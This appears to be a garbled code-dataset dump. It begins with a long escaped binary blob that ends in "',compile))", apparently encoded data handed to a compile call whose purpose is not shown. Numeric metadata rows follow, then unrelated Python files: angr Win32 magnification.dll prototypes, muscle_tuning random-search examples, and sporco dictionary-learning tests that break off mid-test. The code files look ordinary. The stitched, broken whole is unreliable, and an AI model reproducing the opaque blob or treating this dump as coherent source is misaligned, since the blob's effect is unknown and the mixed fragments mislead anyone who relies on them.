l\xe0\xf6\x9a\xe1\xc5\xe9;\xde\x07\xee\xcf,C\xe5\x19\x03\xa7\xe6\x80\x14\x7f\xbct3G\xf6\r\x1c\xf1\x91\xdb7\xd5C\xf9<z4\xaf\xf0\x82\x10\x18\xd3\xdb=\xb1\xa8:\xc8e!\xe0\xa6\x83O\x0f,F)I\x82\x14#\x83&\x12\xb2\x05q[>\xa9L\xc4\x14\x0fFq\xc4\xa1|\xcbV\x92\xee7\xaed|\xa8\xa6\xeeP\xd6/`@\xd3iF\xf4\x8d\x19C\xa6\xae\xd8Z4uP\xbc\x00\xc60\xbe\xaf\xb4\x9d\xeb\xd3\xda\x8d\xab\xc5r\x8bs\xc8\xa9S\xc6\xa7\x9c\xdb\xad$\x19\xca\\D\x8c-\x98 \x0f\r\xf9xH\x87q\x12\xca\xc5\xb1\xa7\xaa\x81\x0c\xe9\x98\x9b\xb7\xa3\x840\xfe\x94\xa4\xff\xf6\x81}!5\xa8c\xb9!\x84\xb3`\\z\xd1\xf48\x91D5\x06\x13(\xb4\x7f\xa3\xe1\xc8\xab\xd1\xc8R\xc6\xd5"\x14ueW7\xbf\xe0\xd9\x8f\x05m`x\xcb`0]\xdc\xef"\xe1\x02au\x98\x0f\xcfh"\xb5\xd0\x96\x03U\xdd\xa7\xfc\x18/\x04\x96\x18\xb1Xx\xd0\xee1\x002r\xf6\xfbW\x07\x9a\x9f\xc6\xf6fYn\xb6\xd0\xf7\xdf\xe4\x15\xba\x07\xca9ka\x0f^~\x9e5\xc0L\x99bl\xefC\x9e\x13\xe8\x0b\x8c<r;P\x83\x13\x8fT\x04\xea@M\xf1\xdd\xf7J\x9c\xcfw\xb6\x1e\xa4\x16\xb9\xdb\xd5\xa87\xc17s\x7f\x19\xef,\x1d\xa0\xe6\xec\x0e\xed\xe7"w\xe5w5\x1aX\x1eg5&\xfb\xd0\xba`\x19h\xd1\xbd]i\xafk\r\xeb\x16TH\xf1\xa1x9\x05\x93\x85:\xc2\xff\x9a\xba\xb6\x9d(\x82 \xfa1\xca\x1ad\x1fz\x18\xf6\xd2\x18^X\x89\x81\xa0Y@\x8d$cp\xa6\xbb\'\x9a \x18\x19\xc4\x18\xfdw9\x97Y}"\xbc\xec\xf6VWUW\xd59U\x95\xea\xdf\xe0\xda\xcc\xad\xf8\xb8\xa4\x8c\xce\x87|9\x1cc,[6\x9f!\xb5jj\xbek\xfe\xc1\x8d\xdc\x10\t\xe1P\xd2\xd1i\xe8L\xf2\xe0\xb2y\x9am\x94\x1b\x83Ke2T\xc9T\xb8s\xf7Qj\xdf\xa7\xd3W\x00>\xd2\xc2)\xa5\xb6\x15\x11\x9d|\xd2l\xc6\xec\xb3\xc2\xce\xad\xbaa\xb6\xba\x92N\x91\xc3S\x7f\x96\xac7\xa3\x81\xb9\xd7\xceE\xe6\xe8\xe2\xca\x18\x15\x8d\xcb\xa6\x99^/\xf5h\x14\x90Tx+dv\xe2\xa1L\x98\xed\x16\x8d\xed\xd1\xb6\x8dju\xfdG\x7fpu\xb37b\x12f\x11qR\x14;q\xb1:+\xb3\x95\x84\xfd2\x8bC}P\xd8\x80e<\xa9\xeb\xee\x8c+\xd9n\xe5d\xbe7\n\x07S\xa7=w\xcd\xcd\x95\x8c\xafg\x87h\xef2`\x0c\x086\xd0\xb8X\x19Y\xe5 \xd58a\xe3+\xd3\xfa\xfb\x89<P\xc5\x991\x86\x10\xcal\xcb\xc5\x85\xb9\xb1[\xf6(\xc1\x01\x84\t4\xb8z\xfap\xd2\x0cGk9\xb8d\x08$\xa1\xf6P\xe0o\xab\xdd\xd7\xbb/\x0e\xce$J\x12\x95\xcd5g\xef\x9e\xff\xb2\x07\xa4\xca\x07\xfb\xb2\x19\x04\x0b\xea}\x95\xaa\xb5\xf9\x104\x06\xe6s\x1d\x07\xd6~P\xfa\xc0\x9c,\xc8!\x92i]\xbca*\x8f\x95R\xc8evy\xbe~\xbe\x82T\x98s-\xa4\xa9\x1c3]\xcb\xb4S\xfb\xf6\xdd\x1b\x84\xf4\x19mHi5\x96\rHO):;u\xb3\xe8\xe1\xd7|\x90\xf7\xa0\\ f\xc9,D\xb6\xc9\x11\x8b\x8d+,\xf6G\xcd\x89?\xb6p\xe7\'\x8ce%\xef\x9cQ\x00E%\x89\x87I\xbf\xeetm\x1c\x15\xe2\xda\xfc\xd2%:-\x97\xd9\xd3?\xc4A)\t\xdd!\x1f\xc1\xeae3\xdc\xa32\xd0\r>\xf2\xa8\xcd\x84Y\xfe\xfb\xa9\xad\x99o$a\xe2|\x8f"\x1ap\xc4\xb9-\xbf_\xd7\x9fv\xfe8\xd9\xc1N@\xb6\n!<&\x14\x1ce\xb6m\xbd\xa3\xc7+fs\xf5\x93\xa1\x83\xc2_\x17\x90\xb8\x95Z*\x8b\xef\xe6\x00:\xb3}\xe8\xaeX\x9b\xf9)at\xa0\xf5\xf0=F\x9b\xf1\xb2\x1e\xd0\xdb\x815\x0e=\xc0\xa5\x9e\xec\xa5pz\xaa\xa7#\xf4\x17\xccTx\x07\xcf\xa6\xe9\xf6\xeb\xb7/\xd7e{\xfb/=\xc9\xc4\xce',compile)) | 28,732.2 | 143,472 | 0.734785 | 33,072 | 143,661 | 3.1849 | 0.178187 | 0.000399 | 0.000152 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.232405 | 0.001845 | 143,661 | 5 | 143,472 | 28,732.2 | 0.502141 | 0.001253 | 0 | 0 | 0 | 119 | 0.662252 | 0.660419 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
fe2301d9cd1e7d7943af459f66e0153c024a0c09 | 10,814 | py | Python | angr/procedures/definitions/win32_magnification.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_magnification.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | angr/procedures/definitions/win32_magnification.py | r4b3rt/angr | c133cfd4f83ffea2a1d9e064241e9459eaabc55f | [
"BSD-2-Clause"
] | null | null | null | # pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("magnification.dll")
prototypes = \
{
#
'MagInitialize': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MagUninitialize': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'MagSetWindowSource': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "rect"]),
#
'MagGetWindowSource': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pRect"]),
#
'MagSetWindowTransform': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"v": SimTypeFixedSizeArray(SimTypeFloat(size=32), 9)}, name="MAGTRANSFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pTransform"]),
#
'MagGetWindowTransform': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"v": SimTypeFixedSizeArray(SimTypeFloat(size=32), 9)}, name="MAGTRANSFORM", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pTransform"]),
#
'MagSetWindowFilterList': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "dwFilterMode", "count", "pHWND"]),
#
'MagGetWindowFilterList': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pdwFilterMode", "count", "pHWND"]),
#
'MagSetImageScalingCallback': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimStruct({"width": SimTypeInt(signed=False, label="UInt32"), "height": SimTypeInt(signed=False, label="UInt32"), "format": SimTypeBottom(label="Guid"), "stride": SimTypeInt(signed=False, label="UInt32"), "offset": SimTypeInt(signed=False, label="UInt32"), "cbSize": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)}, name="MAGIMAGEHEADER", pack=False, align=None), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimStruct({"width": SimTypeInt(signed=False, label="UInt32"), "height": SimTypeInt(signed=False, label="UInt32"), "format": SimTypeBottom(label="Guid"), "stride": SimTypeInt(signed=False, label="UInt32"), "offset": SimTypeInt(signed=False, label="UInt32"), "cbSize": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)}, name="MAGIMAGEHEADER", pack=False, align=None), SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "srcdata", "srcheader", "destdata", "destheader", "unclipped", "clipped", "dirty"]), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "callback"]),
#
'MagGetImageScalingCallback': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimStruct({"width": SimTypeInt(signed=False, label="UInt32"), "height": SimTypeInt(signed=False, label="UInt32"), "format": SimTypeBottom(label="Guid"), "stride": SimTypeInt(signed=False, label="UInt32"), "offset": SimTypeInt(signed=False, label="UInt32"), "cbSize": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)}, name="MAGIMAGEHEADER", pack=False, align=None), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimStruct({"width": SimTypeInt(signed=False, label="UInt32"), "height": SimTypeInt(signed=False, label="UInt32"), "format": SimTypeBottom(label="Guid"), "stride": SimTypeInt(signed=False, label="UInt32"), "offset": SimTypeInt(signed=False, label="UInt32"), "cbSize": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0)}, name="MAGIMAGEHEADER", pack=False, align=None), SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "srcdata", "srcheader", "destdata", "destheader", "unclipped", "clipped", "dirty"]), offset=0), arg_names=["hwnd"]),
#
'MagSetColorEffect': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"transform": SimTypeFixedSizeArray(SimTypeFloat(size=32), 25)}, name="MAGCOLOREFFECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pEffect"]),
#
'MagGetColorEffect': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"transform": SimTypeFixedSizeArray(SimTypeFloat(size=32), 25)}, name="MAGCOLOREFFECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["hwnd", "pEffect"]),
#
'MagSetFullscreenTransform': SimTypeFunction([SimTypeFloat(size=32), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["magLevel", "xOffset", "yOffset"]),
#
'MagGetFullscreenTransform': SimTypeFunction([SimTypePointer(SimTypeFloat(size=32), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pMagLevel", "pxOffset", "pyOffset"]),
#
'MagSetFullscreenColorEffect': SimTypeFunction([SimTypePointer(SimStruct({"transform": SimTypeFixedSizeArray(SimTypeFloat(size=32), 25)}, name="MAGCOLOREFFECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pEffect"]),
#
'MagGetFullscreenColorEffect': SimTypeFunction([SimTypePointer(SimStruct({"transform": SimTypeFixedSizeArray(SimTypeFloat(size=32), 25)}, name="MAGCOLOREFFECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pEffect"]),
#
'MagSetInputTransform': SimTypeFunction([SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["fEnabled", "pRectSource", "pRectDest"]),
#
'MagGetInputTransform': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pfEnabled", "pRectSource", "pRectDest"]),
#
'MagShowSystemCursor': SimTypeFunction([SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["fShowCursor"]),
}
lib.set_prototypes(prototypes)
| 180.233333 | 1,952 | 0.718143 | 1,179 | 10,814 | 6.5581 | 0.109415 | 0.221417 | 0.219865 | 0.274832 | 0.847517 | 0.845447 | 0.819969 | 0.819064 | 0.813632 | 0.803026 | 0 | 0.025537 | 0.087479 | 10,814 | 59 | 1,953 | 183.288136 | 0.758006 | 0.002589 | 0 | 0 | 0 | 0 | 0.187419 | 0.02252 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.151515 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
fe74843ed9f65cafaa4f076db3ee7925c0d374fb | 2,932 | py | Python | examples/method_examples/random_search_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | examples/method_examples/random_search_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | examples/method_examples/random_search_tuning.py | c60evaporator/param_tuning_utility | 8518b76369dcc918172a87ab4c975ee3a12f7045 | [
"BSD-3-Clause"
] | null | null | null | # %% random_search_tuning(), no argument
import parent_import
from muscle_tuning import RFRegressorTuning
from sklearn.datasets import load_boston
import pandas as pd
# Load dataset
USE_EXPLANATORY = ['CRIM', 'NOX', 'RM', 'DIS', 'LSTAT']
df_boston = pd.DataFrame(load_boston().data, columns=load_boston().feature_names)
X = df_boston[USE_EXPLANATORY].values
y = load_boston().target
tuning = RFRegressorTuning(X, y, USE_EXPLANATORY)
###### Run random_search_tuning() ######
best_params, best_score = tuning.random_search_tuning()
# %% random_search_tuning(), Set parameter range by 'tuning_params' argument
import parent_import
from muscle_tuning import RFRegressorTuning
from sklearn.datasets import load_boston
import pandas as pd
# Load dataset
USE_EXPLANATORY = ['CRIM', 'NOX', 'RM', 'DIS', 'LSTAT']
df_boston = pd.DataFrame(load_boston().data, columns=load_boston().feature_names)
X = df_boston[USE_EXPLANATORY].values
y = load_boston().target
tuning = RFRegressorTuning(X, y, USE_EXPLANATORY)
# Set 'tuning_params' argument
CV_PARAMS_RANDOM = {'n_estimators': [20, 30, 40, 60, 80, 120, 160],
'max_features': [2, 3, 4, 5],
'max_depth': [2, 3, 4, 6, 8, 12, 16, 24, 32],
'min_samples_split': [2, 3, 4, 6, 8, 12, 16, 24, 32],
'min_samples_leaf': [1, 2, 3, 4, 6, 8, 12, 16]
}
###### Run random_search_tuning() ######
best_params, best_score = tuning.random_search_tuning(tuning_params=CV_PARAMS_RANDOM,
n_iter=160)
# %% random_search_tuning(), Set estimator by 'estimator' argument
import parent_import
from muscle_tuning import RFRegressorTuning
from sklearn.datasets import load_boston
import pandas as pd
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestRegressor
# Load dataset
USE_EXPLANATORY = ['CRIM', 'NOX', 'RM', 'DIS', 'LSTAT']
df_boston = pd.DataFrame(load_boston().data, columns=load_boston().feature_names)
X = df_boston[USE_EXPLANATORY].values
y = load_boston().target
tuning = RFRegressorTuning(X, y, USE_EXPLANATORY)
# Set 'estimator' argument
ESTIMATOR = Pipeline([("scaler", StandardScaler()), ("rf", RandomForestRegressor())])
# Set 'tuning_params' argument
CV_PARAMS_RANDOM = {'n_estimators': [20, 30, 40, 60, 80, 120, 160],
'max_features': [2, 3, 4, 5],
'max_depth': [2, 3, 4, 6, 8, 12, 16, 24, 32],
'min_samples_split': [2, 3, 4, 6, 8, 12, 16, 24, 32],
'min_samples_leaf': [1, 2, 3, 4, 6, 8, 12, 16]
}
###### Run grid_search_tuning() ######
best_params, best_score = tuning.random_search_tuning(estimator=ESTIMATOR,
tuning_params=CV_PARAMS_RANDOM,
n_iter=160)
# %%
| 44.424242 | 85 | 0.646999 | 378 | 2,932 | 4.783069 | 0.214286 | 0.066372 | 0.079646 | 0.013274 | 0.816372 | 0.816372 | 0.816372 | 0.816372 | 0.778761 | 0.778761 | 0 | 0.051777 | 0.222715 | 2,932 | 65 | 86 | 45.107692 | 0.741553 | 0.13131 | 0 | 0.795918 | 0 | 0 | 0.0764 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.306122 | 0 | 0.306122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
fea19a8189c7ad12a5bca5bacc2b1ea6e197df97 | 11,771 | py | Python | alphacsc/other/sporco/sporco/admm/tests/test_parcnsdl.py | sophiaas/alphacsc | 402b8f6c8ee4ba9c86e9da0e2073d900cf8da207 | [
"BSD-3-Clause"
] | 89 | 2017-05-31T19:20:52.000Z | 2022-03-22T09:52:17.000Z | alphacsc/other/sporco/sporco/admm/tests/test_parcnsdl.py | sophiaas/alphacsc | 402b8f6c8ee4ba9c86e9da0e2073d900cf8da207 | [
"BSD-3-Clause"
] | 75 | 2017-07-15T14:03:40.000Z | 2022-03-29T17:31:58.000Z | alphacsc/other/sporco/sporco/admm/tests/test_parcnsdl.py | sophiaas/alphacsc | 402b8f6c8ee4ba9c86e9da0e2073d900cf8da207 | [
"BSD-3-Clause"
] | 35 | 2017-06-16T12:48:23.000Z | 2022-03-21T09:49:55.000Z | from __future__ import division
from builtins import object
import pytest
import numpy as np
from sporco.admm import parcnsdl
from sporco.admm import cbpdndl
class TestSet01(object):
def setup_method(self, method):
np.random.seed(12345)
N = 16
Nd = 5
M = 4
K = 3
self.D0 = np.random.randn(Nd, Nd, M)
self.S = np.random.randn(N, N, K)
def test_01(self):
lmbda = 1e-1
opt = parcnsdl.ConvBPDNDictLearn_Consensus.Options({'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNDictLearn_Consensus(self.D0, self.S[...,0],
lmbda, opt=opt, nproc=2, dimK=0)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_02(self):
lmbda = 1e-1
opt = parcnsdl.ConvBPDNDictLearn_Consensus.Options({'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNDictLearn_Consensus(self.D0, self.S, lmbda,
opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_03(self):
lmbda = 1e-1
opt = parcnsdl.ConvBPDNDictLearn_Consensus.Options({'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNDictLearn_Consensus(self.D0, self.S, lmbda,
opt=opt, nproc=0)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_04(self):
N = 16
Nc = 3
Nd = 5
M = 4
K = 3
D0 = np.random.randn(Nd, Nd, Nc, M)
S = np.random.randn(N, N, Nc, K)
lmbda = 1e-1
opt = parcnsdl.ConvBPDNDictLearn_Consensus.Options({'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNDictLearn_Consensus(D0, S, lmbda, opt=opt,
nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_05(self):
lmbda = 1e-1
Nit = 10
opts = cbpdndl.ConvBPDNDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNDictLearn(self.D0, self.S, lmbda, opt=opts,
method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.0},
'CCMOD': {'RelaxParam': 1.0}})
bp = parcnsdl.ConvBPDNDictLearn_Consensus(self.D0, self.S, lmbda,
opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
def test_06(self):
lmbda = 1e-1
Nit = 10
opts = cbpdndl.ConvBPDNDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.8, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.8, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNDictLearn(self.D0, self.S, lmbda, opt=opts,
method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.8},
'CCMOD': {'RelaxParam': 1.8}})
bp = parcnsdl.ConvBPDNDictLearn_Consensus(self.D0, self.S, lmbda,
opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
def test_07(self):
lmbda = 1e-1
W = np.array([1.0])
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S[...,0], lmbda, W, opt=opt, nproc=2, dimK=0)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_08(self):
lmbda = 1e-1
W = np.array([1.0])
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_09(self):
lmbda = 1e-1
W = np.array([1.0])
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=opt, nproc=0)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_10(self):
N = 16
Nc = 3
Nd = 5
M = 4
K = 3
D0 = np.random.randn(Nd, Nd, Nc, M)
S = np.random.randn(N, N, Nc, K)
lmbda = 1e-1
W = np.array([1.0])
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(D0,
S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_11(self):
lmbda = 1e-1
W = np.array([1.0])
Nit = 10
opts = cbpdndl.ConvBPDNMaskDcplDictLearn.Options(
{'MaxMainIter': Nit, 'AccurateDFid': True,
'CBPDN': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}},
'CCMOD': {'RelaxParam': 1.0, 'AutoRho': {'Enabled': False}}})
bs = cbpdndl.ConvBPDNMaskDcplDictLearn(self.D0, self.S, lmbda, W,
opt=opts, method='cns')
Ds = bs.solve()
optp = parcnsdl.ConvBPDNDictLearn_Consensus.Options(
{'MaxMainIter': Nit, 'CBPDN': {'RelaxParam': 1.0},
'CCMOD': {'RelaxParam': 1.0}})
bp = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=optp, nproc=2)
Dp = bp.solve()
assert(np.linalg.norm(Ds - Dp) < 1e-7)
assert(np.abs(bs.getitstat().ObjFun[-1] - bp.getitstat().ObjFun[-1])
< 1e-7)
def test_12(self):
lmbda = 1e-1
W = np.ones(self.S.shape[0:2] + (1, self.S.shape[2], 1))
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_13(self):
lmbda = 1e-1
W = np.ones(self.S.shape[0:2] + (1, 1, 1))
opt = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus.Options(
{'MaxMainIter': 10})
try:
b = parcnsdl.ConvBPDNMaskDcplDictLearn_Consensus(self.D0,
self.S, lmbda, W, opt=opt, nproc=2)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_14(self):
N = 16
Nc = 3
Nd = 5
M = 4
K = 3
D0 = np.random.randn(Nd, Nd, Nc, M)
S = np.random.randn(N, N, Nc, K)
lmbda = 1e-1
W = np.ones(S.shape[0:2] + (1, 1, 1))
